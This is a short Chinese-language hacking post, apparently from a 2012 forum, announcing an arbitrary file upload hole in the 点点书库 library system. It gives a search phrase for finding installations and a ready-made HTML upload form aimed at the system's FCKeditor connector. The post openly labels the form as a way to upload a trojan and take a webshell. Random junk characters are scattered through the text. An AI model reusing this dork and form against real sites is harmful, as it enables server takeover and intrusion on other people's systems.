主题:图书馆系统任意文件上传漏洞
d- A' T$ w u 作者:冰锋刺客
6 l' O0 y+ s, q* r# w( d0 j" e 厂商:点击书(dianjishu.com). x0 e5 P q, `: r# R
日期:2012-6-21
9 o; Y: D8 b1 P6 j , P. x$ y) X8 f
I 概述
& C f0 \' V4 o" r8 O, n$ y' ~ 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
# Y5 }4 m2 L" K" `8 } II 简介 `" s+ p7 f5 [
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"/ U1 P, R4 K9 d
补充一个漏洞
! p6 h; H2 R; Y: R <form id="frmUpload" enctype="multipart/form-data"
1 i2 T9 I* T( U# a3 j action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
) j" C$ c" ~+ y4 [ <input id="btnUpload" type="submit" value="操翻他">
9 h2 U$ J% y& n </form>
$ \6 O" M* L8 s( L4 f 你们懂的9 U9 \. D3 @ x9 f3 Y4 I
那傻逼提供还需要改包. M$ y0 s1 {. T% v3 i
自己看了下源代码发现fckeditor
) U3 }/ O4 P, | 直接秒杀9 S+ L: j6 T( P0 u: ]0 x' k* a
|